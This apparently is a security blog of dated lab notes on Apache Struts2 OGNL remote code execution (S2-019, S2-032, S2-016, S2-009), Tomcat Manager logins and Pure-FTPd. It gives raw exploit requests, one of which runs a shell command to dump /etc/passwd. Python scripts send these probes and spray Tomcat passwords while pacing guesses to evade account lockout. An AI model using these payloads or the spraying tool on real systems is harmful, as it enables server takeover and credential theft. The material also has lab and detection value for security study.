Neurohazard
Evening clouds and misty moon; white-haired, still poring over the classics. All things in the universe: thus have I heard.

Struts2 S2-019 HTTP raw text

September 12, 2019


Detection request

```http
POST /example/HelloWorld.action HTTP/1.1
Host: 192.168.198.133:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 492
Content-Type: application/x-www-form-urlencoded

debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()
```

Response (the class names are assembled by string concatenation and the marker is printed in two halves, so neither appears literally in the request; a chunked body whose single chunk is `struts2_security_check` shows the expression was evaluated rather than echoed):

```http
HTTP/1.1 200
Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly
Content-Type: text/plain;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Thu, 12 Sep 2019 07:42:15 GMT
Connection: close

16
struts2_security_check
0
```

Exploitation request

```http
POST /example/HelloWorld.action HTTP/1.1
Host: 192.168.198.133:80
Accept-Language: zh_CN
[…]
```

September 12, 2019

Struts2 S2-020 environment

https://hub.docker.com/r/tutum/tomcat is a Tomcat image with the host manager already set up.

September 12, 2019

Analysis of an RCE vulnerability affecting all versions of 某道

https://xz.aliyun.com/t/6239

September 12, 2019

Struts S2-032 HTTP raw text

Analysis

[![s2-032](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")

Probe request

```http
POST / HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133:8888
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 209

method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close
```

Response (the body is the result of `88888888-1`; an application that merely reflected the parameter would return the unevaluated expression, so the arithmetic is the evidence of OGNL execution):

```http
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 9
Date: Thu, 12 Sep 2019 04:07:32 GMT

88888887
```

OGNL (URL-decoded; the `+` characters are URL-encoded spaces):

```
method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close
```

Exploitation request

```http
POST […]
```

September 11, 2019

Struts S2-016 HTTP Raw TEXT

Exploitation request (the `redirect:` prefix is evaluated as OGNL; the expression runs `/bin/sh -c 'cat /etc/passwd'` through `ProcessBuilder` and writes the output into the response):

```http
POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 651

redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/sh','-c','cat+/etc/passwd'})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D=
```

Response

```http
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 07:07:30 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/
Content-Language: zh-CN

679
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
[…]
```

September 11, 2019

Struts S2-009 HTTP Raw TEXT

Request (the OGNL is smuggled in through a parameter name; `denyMethodExecution` and `allowStaticMethodAccess` are flipped before the static `ServletActionContext` call, and the second parameter `z[(class.classLoader.jarPath)('meh')]` triggers evaluation of the first):

```http
POST /login.action HTTP/1.1
Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36
User-Agent: Java/1.8.0_212
Host: 192.168.198.133
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 444

class.classLoader.jarPath=%28%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23outstr%3d@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23outstr.print%28%22webpath%22%29%2c%23outstr.println%28%22888888%22%29%2c%23outstr.close%28%29%29%28meh%29&z%5b%28class.classLoader.jarPath%29%28%27meh%27%29%5d=
```

Response (`webpath` and `888888` are printed by two separate calls, so the joined string only appears if the expression ran):

```http
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Wed, 11 Sep 2019 04:00:24 GMT
Content-Length: 15
Connection: keep-alive
Set-Cookie: JSESSIONID=16985C7B820E22E13767E10B8AD57496-n1; Path=/
Content-Language: zh-CN

webpath888888
```
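The four Struts captures above (S2-019, S2-032, S2-016 and this S2-009 one) share one detection idea: the probe makes the server compute or concatenate a marker that never appears literally in the request, so a parameter-echoing page cannot produce a false positive. The following Python is an added example, not the blog's tooling or any scanner's code: it parses a raw HTTP/1.1 response (Content-Length or chunked framing, as in the captures), checks each probe's marker, and verifies that the marker is absent from the URL-decoded request. The request bodies are copied from the captures; the sample responses are reconstructed from them (constructed data), and `send_probe` with its host/port/path arguments is an assumed helper for live use.

```python
"""Offline checker for the Struts2 OGNL probes captured above. Added example:
parses raw HTTP/1.1 responses and decides whether the probe's marker came back."""
import socket
from urllib.parse import unquote_plus

# Request bodies exactly as sent in the captures (still URL-encoded).
S2_019_BODY = ("debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b"
               "%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b"
               "%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo"
               "%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),"
               "%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print("
               "%22struts2_security_%22),%23resp.getWriter().print(%22check%22),"
               "%23resp.getWriter().flush(),%23resp.getWriter().close()")
S2_032_BODY = ("method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c"
               "%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29"
               ".getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close")

# Marker each probe must produce. None appears literally in its request: S2-019
# prints two halves, S2-032 prints 88888888-1, S2-009 prints a prefix then a
# number, S2-016 returns a file the server read.
MARKERS = {
    "S2-019": lambda t: "struts2_security_check" in t,
    "S2-032": lambda t: "88888887" in t,
    "S2-009": lambda t: "webpath888888" in t,
    "S2-016": lambda t: t.lstrip().startswith("root:x:0:0:"),
}


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status, headers, body). Body is
    de-chunked, cut at Content-Length, or taken verbatim (Connection: close)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])        # "HTTP/1.1 200" or "HTTP/1.1 200 OK"
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if headers.get("transfer-encoding", "").lower() == "chunked":
        return status, headers, _dechunk(rest)
    if "content-length" in headers:
        return status, headers, rest[: int(headers["content-length"])]
    return status, headers, rest


def _dechunk(data: bytes) -> bytes:
    """Decode a chunked body: hex size line, data, CRLF, ... until a 0 chunk."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)   # drop chunk extensions
        if size == 0:
            break
        out += data[eol + 2: eol + 2 + size]
        pos = eol + 2 + size + 2                       # skip data and its CRLF
    return bytes(out)


def marker_not_in_request(body_urlencoded: str, marker: str) -> bool:
    """Probe hygiene: the decoded request must not contain the marker."""
    return marker not in unquote_plus(body_urlencoded)


def ognl_executed(kind: str, body: bytes) -> bool:
    """True when the body carries the marker only OGNL evaluation could produce."""
    return MARKERS[kind](body.decode("latin-1"))


def send_probe(host: str, port: int, path: str, body: str, timeout: float = 10.0):
    """Assumed helper: send one probe over a raw socket, byte-for-byte like the
    captures, and return the parsed response (Connection: close, read to EOF)."""
    request = (f"POST {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n{body}")
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("latin-1"))
        raw = b"".join(iter(lambda: s.recv(65536), b""))
    return parse_response(raw)


# Responses reconstructed from the captures (constructed sample data).
S2_019_RESPONSE = (b"HTTP/1.1 200\r\n"
                   b"Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly\r\n"
                   b"Content-Type: text/plain;charset=ISO-8859-1\r\n"
                   b"Transfer-Encoding: chunked\r\nConnection: close\r\n\r\n"
                   b"16\r\nstruts2_security_check\r\n0\r\n\r\n")
S2_032_RESPONSE = (b"HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n"
                   b"Content-Length: 9\r\n\r\n88888887\n")

if __name__ == "__main__":
    for kind, raw in (("S2-019", S2_019_RESPONSE), ("S2-032", S2_032_RESPONSE)):
        status, _, body = parse_response(raw)
        print(kind, status, body, "executed" if ognl_executed(kind, body) else "no")
    # live: send_probe("192.168.198.133", 80, "/example/HelloWorld.action", S2_019_BODY)
```

Run the module directly to check the reconstructed captures offline; for a live target call `send_probe` with the host, port and action path of the lab and pass the body to `ognl_executed`. The `marker_not_in_request` check is worth running on any new payload before use: if the marker is already in the request, a 200 with the marker proves nothing.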

September 11, 2019

Wireshark frequently used filters


September 11, 2019

CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server

https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb

September 10, 2019

Tomcat 8 Manager user authentication enumeration (weak-password brute forcing)

HTTP interaction analysis

Authentication request using HTTP Basic Auth (the token `dG9tY2F0OnRvbWNhdA==` is base64 of `tomcat:tomcat`):

```http
GET /manager/html HTTP/1.1
Host: 192.168.198.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
```

Response headers on successful authentication

```http
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Set-Cookie: JSESSIONID=1CA160B50A85CD4F22555D92B051B7C9; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Tue, […]
```
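An added Python example (not the blog's script) for the credential check described above. It builds the same `Authorization: Basic` header as the capture, tells Tomcat's three answers apart (200 valid with `manager-gui`, 401 rejected, 403 valid credentials but no role, which is still a found password), and paces guesses under the `LockOutRealm` that a stock `server.xml` wraps around the user database: five failures within 300 seconds lock the user for 300 seconds, after which even the right password returns 401, and further attempts while locked extend the lock. Host, port and the credential lists are assumptions for the lab.

```python
"""Tomcat Manager Basic Auth credential check. Added example, not the post's code."""
import base64
import time
from http.client import HTTPConnection


def basic_header(user: str, password: str) -> str:
    """Build the Authorization value exactly as a browser does."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic(header: str) -> tuple:
    """Inverse, for triaging a captured header: returns (user, password)."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not HTTP Basic auth")
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


def classify(status: int) -> str:
    """Container security answers: 200 = valid + manager-gui role,
    401 = rejected (or locked out; indistinguishable), 403 = valid, role missing."""
    return {200: "valid", 401: "rejected", 403: "valid-no-role"}.get(status, f"other:{status}")


def try_login(host: str, port: int, user: str, password: str,
              path: str = "/manager/html", timeout: float = 10.0) -> int:
    """One GET with credentials; returns the HTTP status."""
    conn = HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Authorization": basic_header(user, password)})
        return conn.getresponse().status
    finally:
        conn.close()


# Stock LockOutRealm defaults: failureCount=5, lockOutTime=300 seconds.
LOCKOUT_FAILURES, LOCKOUT_WINDOW = 5, 300


def spray(host: str, port: int, users, passwords,
          per_user_budget: int = LOCKOUT_FAILURES - 1) -> dict:
    """Try passwords per user without ever reaching the lockout threshold in
    one window; returns {(user, password): classification}."""
    results = {}
    for user in users:
        failures = 0
        for password in passwords:
            if failures >= per_user_budget:
                time.sleep(LOCKOUT_WINDOW + 5)   # let the failure counter age out
                failures = 0
            outcome = classify(try_login(host, port, user, password))
            results[(user, password)] = outcome
            if outcome != "rejected":
                break                             # password found (role or not)
            failures += 1
    return results


if __name__ == "__main__":
    print(decode_basic("Basic dG9tY2F0OnRvbWNhdA=="))
    # live: spray("192.168.198.133", 8080, ["tomcat", "admin"], ["tomcat", "admin", "s3cret"])
```

A 403 is the case most brute-force scripts throw away: the password is right, the account simply lacks `manager-gui`, and the same credentials often work for `manager-script` or for the host manager. Keep the per-user budget below five unless the realm has been confirmed not to be wrapped in `LockOutRealm`; otherwise the valid password, when it is finally tried, comes back as a 401 too.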

September 9, 2019

Pure-FTPd vulnerability landscape analysis

Overview

https://www.cvedetails.com/product/20682/Pureftpd-Pure-ftpd.html?vendor_id=2152

Vulnerabilities assigned CVE IDs in 2011: https://www.cvedetails.com/vulnerability-list/vendor_id-2152/product_id-20682/year-2011/Pureftpd-Pure-ftpd.html

No CVE-assigned vulnerabilities have appeared for 2012-2016.

Vulnerabilities assigned CVE IDs in 2017: https://www.cvedetails.com/vulnerability-list/vendor_id-2152/product_id-20682/year-2017/Pureftpd-Pure-ftpd.html

Environment setup

https://hub.docker.com/r/phpstorm/pureftpd/dockerfile

```shell
docker pull phpstorm/pureftpd
docker run --rm -d -p 2121:21 -p 30020-30029:30020-30029 -it phpstorm/pureftpd
```

No version number is disclosed during the FTP interaction.
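The last observation (no version in the interaction) is what makes matching this lab against the CVE lists above hard, so here is an added Python example, not part of the post, that grabs and parses the FTP greeting according to RFC 959 multi-line reply framing (`NNN-` continuation lines until `NNN `) and reports what it discloses. The default Pure-FTPd banner names the daemon and its build flags such as `[privsep]` and `[TLS]`, nothing more; the sample greeting below is constructed in that shape, and the `grab` helper's host and port are assumptions for the docker lab.

```python
"""FTP greeting fingerprinting. Added example, not the post's tooling."""
import io
import re
import socket

# Constructed sample in the shape of a default Pure-FTPd greeting.
SAMPLE_GREETING = (
    b"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\r\n"
    b"220-You are user number 1 of 50 allowed.\r\n"
    b"220-Local time is now 08:00. Server port: 21.\r\n"
    b"220-This is a private system - No anonymous login\r\n"
    b"220 You will be disconnected after 15 minutes of inactivity.\r\n"
)


def read_reply(f):
    """Read one FTP reply from a binary file object: a single 'NNN text' line,
    or 'NNN-text' followed by lines up to and including 'NNN text'."""
    first = f.readline().decode("latin-1").rstrip("\r\n")
    code = int(first[:3])
    lines = [first[4:]]
    if first[3:4] == "-":
        while True:
            line = f.readline().decode("latin-1").rstrip("\r\n")
            if not line:                              # EOF inside a reply
                break
            if line.startswith(f"{code} "):
                lines.append(line[4:])
                break
            # continuation lines may or may not repeat the 'NNN-' prefix
            lines.append(line[4:] if line.startswith(f"{code}-") else line)
    return code, lines


def fingerprint(greeting_lines) -> dict:
    """Server name, build flags and version (None when absent) from the banner line."""
    text = "\n".join(greeting_lines)
    m = re.search(r"Welcome to (Pure-FTPd)", text)
    if not m:
        return {"server": None, "flags": [], "version": None}
    tail = text[m.end():].split("\n", 1)[0]          # rest of the banner line
    version = re.search(r"\d+\.\d+(?:\.\d+)?", tail)
    return {"server": m.group(1),
            "flags": re.findall(r"\[([^\]]+)\]", tail),
            "version": version.group(0) if version else None}


def fingerprint_raw(raw: bytes):
    """Parse a captured greeting and fingerprint it: returns (code, fingerprint)."""
    code, lines = read_reply(io.BytesIO(raw))
    return code, fingerprint(lines)


def grab(host: str, port: int = 21, timeout: float = 5.0):
    """Assumed live helper: connect, read the greeting, ask FEAT, quit."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _, greeting = read_reply(f)
        s.sendall(b"FEAT\r\n")
        _, features = read_reply(f)
        s.sendall(b"QUIT\r\n")
    return fingerprint(greeting), features


if __name__ == "__main__":
    print(fingerprint_raw(SAMPLE_GREETING))
    # live, against the container above: grab("127.0.0.1", 2121)
```

With the lab container running, `grab("127.0.0.1", 2121)` returns the parsed greeting plus the FEAT list; the `version` field stays `None`, so any decision about which of the listed CVEs apply has to come from the package or image build, not from the wire.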